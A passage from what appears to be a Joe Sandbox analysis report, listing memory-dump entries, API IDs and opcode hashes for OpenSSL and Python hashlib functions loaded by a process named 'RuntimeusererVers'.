                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeJ_nid2lnJ_nid2snX_md
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1665016204-0
                                                                                                                                                                                                                                          • Opcode ID: ed77c7e200b5a299f4367d3d5b17755c8672caa46e550946c74c720bbe9b0c91
                                                                                                                                                                                                                                          • Instruction ID: 4a737510f0e3b57fdc7503c94c01bc0244f5ca9e9f7f966d3a99cbfd7799ab0f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed77c7e200b5a299f4367d3d5b17755c8672caa46e550946c74c720bbe9b0c91
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4801C421E09F03C2FF699B61A858B3823A0AF54FF6F141639C50E06390DE7CB8E58344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$ClearExceptionFormatMatchesUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3412208678-0
                                                                                                                                                                                                                                          • Opcode ID: b232e96879157e562793b78d46a75f0cb5b4b655f96e12909a82b8d3dd152ccb
                                                                                                                                                                                                                                          • Instruction ID: a2268e64b35727deafdfd753da12b9bbbf8bcbfdc19ead42ad71674239b87a64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b232e96879157e562793b78d46a75f0cb5b4b655f96e12909a82b8d3dd152ccb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF01825B08F8192EA58CB56FC541A56360FF88FD0B144235DD5D97B25DF2DF490C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2268491255-0
                                                                                                                                                                                                                                          • Opcode ID: 0501fa589575d6f3eaf730ced008f5909f2c3022fc05dda30cca060b699d4e5a
                                                                                                                                                                                                                                          • Instruction ID: c5cdd485a3e0714a802b3d544c9a2718485b541a5d83fb6b80649bc5b8edc751
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0501fa589575d6f3eaf730ced008f5909f2c3022fc05dda30cca060b699d4e5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71F04972605E8540EF50AF6194506B86394FFD4BD4F180235FF4D4B696DE28E4918325
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_get_type$J_nid2snL_get_current_compression
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 142675065-0
                                                                                                                                                                                                                                          • Opcode ID: c11d12d9b588753e960aefc8cbe93c452380898eed916eeb5e2f40342b3b5b4f
                                                                                                                                                                                                                                          • Instruction ID: bcd1bed872bb03922ddfafcd77388c412fdf1f7d940c4f4d9974fba5625d8a76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11d12d9b588753e960aefc8cbe93c452380898eed916eeb5e2f40342b3b5b4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BF0D410B0AE0A81FF198B6AA89463452A0AF88FB6B480638CD1E07390DE2CF8D5C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_OccurredR_clear_errorR_peek_last_errorS_mode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 744735716-0
                                                                                                                                                                                                                                          • Opcode ID: 27e5880cbae6fc9e5cdb7477b5843f02d60fd755207fe5d62d99d16496de8ff4
                                                                                                                                                                                                                                          • Instruction ID: 2febe8d02ae1231a49e740f024112dfc3406314348f1a875b6f0aab2107fd351
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e5880cbae6fc9e5cdb7477b5843f02d60fd755207fe5d62d99d16496de8ff4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F09851F08E4381FB959B75A8589392391AF48FF4B184735C92E862E0EF2CB8F58351
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_MemoryObject_X_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 30467670-0
                                                                                                                                                                                                                                          • Opcode ID: ff40f30a92d5eed2e742e76349bf853d5a257016a328a92baeabcb4a8d59bfb5
                                                                                                                                                                                                                                          • Instruction ID: 220964e863377573b1fe41de886ffd7e8b79d50c7daeed4ddcf8e8294eca7ac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff40f30a92d5eed2e742e76349bf853d5a257016a328a92baeabcb4a8d59bfb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0C921E19F0785FB699B61B808B3822A5AF19BB1F081634C90E05390EF7CB8F49390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeObject_Thread_free_lockX_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3834077558-0
                                                                                                                                                                                                                                          • Opcode ID: cf6fcc43b87a8b4a2fc809b38a5bc1d7108a0602b2732fd26c72954d6dda49d8
                                                                                                                                                                                                                                          • Instruction ID: fac4aef39111a317c7dca11d9eb424fec9e6e392228ecf71d03693cf32dfacc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6fcc43b87a8b4a2fc809b38a5bc1d7108a0602b2732fd26c72954d6dda49d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0F822A08E4385EA588B66F59883D2320EB49FF5B185230DA0E06660CF2CF8F5C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocFreeObject_Thread_free_lockX_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 133976240-0
                                                                                                                                                                                                                                          • Opcode ID: 57730f3bc79dfce44f660b9b0e6df719bd62e154393204126429c72edc4f63f9
                                                                                                                                                                                                                                          • Instruction ID: a23c6de626a47e36e1a9661d563032f98d29a9443c21c33dcc7154990a169cee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57730f3bc79dfce44f660b9b0e6df719bd62e154393204126429c72edc4f63f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0AC35A19E4381EA54DB65E5584386320EF48FF5B185230DE1E06614DE2CE8E58340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140 ref: 00007FF81E0D28D7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 00007FF81E0D1496
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 00007FF81E0D149E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 00007FF81E0D14B0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_MD_size.LIBCRYPTO-1_1 ref: 00007FF81E0D14B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 00007FF81E0D14D1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 00007FF81E0D14D9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_block_size.LIBCRYPTO-1_1 ref: 00007FF81E0D14EF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: BIO_ctrl.LIBCRYPTO-1_1 ref: 00007FF81E0D156D
                                                                                                                                                                                                                                          • BIO_ctrl.LIBCRYPTO-1_1 ref: 00007FF81E0D2A07
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlR_flagsX_cipher$D_sizeX_block_sizeX_mdmemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_dtls.c
                                                                                                                                                                                                                                          • API String ID: 1483294773-3140652063
                                                                                                                                                                                                                                          • Opcode ID: 204412abf80564a97c1fafa206ce13a068008e0f88b764c6312e434c6826633e
                                                                                                                                                                                                                                          • Instruction ID: fdfec295c349d463ccb146a01a2099b281e10b499fa8bee8819671cc337310fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 204412abf80564a97c1fafa206ce13a068008e0f88b764c6312e434c6826633e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53618A32605F8492EB94DB16E584BAE77A8FB88BA0F114236EF9C43755DF38E460C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrl
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\d1_lib.c
                                                                                                                                                                                                                                          • API String ID: 3605655398-490761327
                                                                                                                                                                                                                                          • Opcode ID: 4fb5c8f4a442cd5c47344fcfb48cd2715ef5b855b47c975e52132fa561e49fef
                                                                                                                                                                                                                                          • Instruction ID: 384a82f8809aca4ab99337821b34382b9ce9dd69d9726897d5124b29b6221526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb5c8f4a442cd5c47344fcfb48cd2715ef5b855b47c975e52132fa561e49fef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05517E32E04B8686DB58CB15E644BFD77E1FB85BE8F554232DA2D077A1CF38A0618B40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_cleansememcpy
                                                                                                                                                                                                                                          • String ID: traffic upd
                                                                                                                                                                                                                                          • API String ID: 2817969487-79366657
                                                                                                                                                                                                                                          • Opcode ID: f8617069f4cd0e815da06fd2992a78c95339bda7289e02c4423e570d17b17890
                                                                                                                                                                                                                                          • Instruction ID: 22798f03554c084e0fda8920e8a20182afe5c8b816d5600565353a1ee4e1bd09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8617069f4cd0e815da06fd2992a78c95339bda7289e02c4423e570d17b17890
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE316E22A08F8586EA24AB12E4407AAB7A4FB85BE4F400235EF8D47796DF3CF555C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Formatmemset
                                                                                                                                                                                                                                          • String ID: %s%s
                                                                                                                                                                                                                                          • API String ID: 1100529188-3252725368
                                                                                                                                                                                                                                          • Opcode ID: 9297e27a36079c61f600f629d6b8c395e201d79af011432404e753dcc092db21
                                                                                                                                                                                                                                          • Instruction ID: c4b40bb4c5905063590988eb05a8264418a7a10c609698d0b6e51bb2e6fbdbb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9297e27a36079c61f600f629d6b8c395e201d79af011432404e753dcc092db21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3317222A08B8689D714CF25D8602E837A1FB49BF8F485331DA6E477D9DF79E155C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction ID: edf244eb8ebef4f1174fad310597f8dbe674240c754af2162f37f2162b2fe21b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2221A5B2A04A8786EF548F29E91077977E0FB98BE8F458135DA4DC7754EE3CE5508700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_bytes_time64
                                                                                                                                                                                                                                          • String ID: DOWNGRD
                                                                                                                                                                                                                                          • API String ID: 3543108242-2922851170
                                                                                                                                                                                                                                          • Opcode ID: badda77ca74e05cbb1b9a1913239d2957b81495fa8a0d3fb60bfa0f44542addb
                                                                                                                                                                                                                                          • Instruction ID: fb75a49f9b15395f0f7f475888e9d732969286c85f065812f264e7c5be0a8d08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badda77ca74e05cbb1b9a1913239d2957b81495fa8a0d3fb60bfa0f44542addb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A219632B18A42C7EF5C8B29A95247DA292FB94790F544238DB0F87791DE28F9A1C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyObject_IsTrue.PYTHON311 ref: 00007FF81E4E33CB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E1063
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _Py_hashtable_get.PYTHON311 ref: 00007FF81E4E1073
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_flags.LIBCRYPTO-1_1 ref: 00007FF81E4E10A7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E10B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _PyObject_New.PYTHON311 ref: 00007FF81E4E10C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E10D3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 00007FF81E4E10FB
                                                                                                                                                                                                                                          • _PyArg_UnpackKeywords.PYTHON311 ref: 00007FF81E4E341B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_State$Arg_D_flagsDigestInit_exKeywordsPy_hashtable_getTrueUnpackX_new
                                                                                                                                                                                                                                          • String ID: sha3_224
                                                                                                                                                                                                                                          • API String ID: 3901364687-2731072511
                                                                                                                                                                                                                                          • Opcode ID: 56e49af4b8ea5246fdcc7845f3c1ff5b02ac791c8e8e097f65d51e2a5707a248
                                                                                                                                                                                                                                          • Instruction ID: 4fe6c4794ebc99b502beb010d894b2efc907b54bf5b2b45135e8f72fd7f8dcaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56e49af4b8ea5246fdcc7845f3c1ff5b02ac791c8e8e097f65d51e2a5707a248
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21CD32B08F4386EA61CB12E444EA962A4FB48FE4F594231EE4D83745DF7DF9A08740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyObject_IsTrue.PYTHON311 ref: 00007FF81E4E2CCB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E1063
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _Py_hashtable_get.PYTHON311 ref: 00007FF81E4E1073
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_flags.LIBCRYPTO-1_1 ref: 00007FF81E4E10A7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E10B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _PyObject_New.PYTHON311 ref: 00007FF81E4E10C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E10D3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 00007FF81E4E10FB
                                                                                                                                                                                                                                          • _PyArg_UnpackKeywords.PYTHON311 ref: 00007FF81E4E2D1B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_State$Arg_D_flagsDigestInit_exKeywordsPy_hashtable_getTrueUnpackX_new
                                                                                                                                                                                                                                          • String ID: md5
                                                                                                                                                                                                                                          • API String ID: 3901364687-3899452385
                                                                                                                                                                                                                                          • Opcode ID: 980258609fd57627985029a1359037be3026fba797028a88728b7d60e3954ae3
                                                                                                                                                                                                                                          • Instruction ID: 8c7af7c992131117dfc9738c85cf149c03d059d19d544439bd312090026b403e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 980258609fd57627985029a1359037be3026fba797028a88728b7d60e3954ae3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA21BE72A08F438AEA64CB11E445AA962A4FB48FE4F184231EE4E47744DF7CF9A0C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyObject_IsTrue.PYTHON311 ref: 00007FF81E4E2BEB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E1063
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _Py_hashtable_get.PYTHON311 ref: 00007FF81E4E1073
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_flags.LIBCRYPTO-1_1 ref: 00007FF81E4E10A7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E10B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _PyObject_New.PYTHON311 ref: 00007FF81E4E10C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E10D3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 00007FF81E4E10FB
                                                                                                                                                                                                                                          • _PyArg_UnpackKeywords.PYTHON311 ref: 00007FF81E4E2C3B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
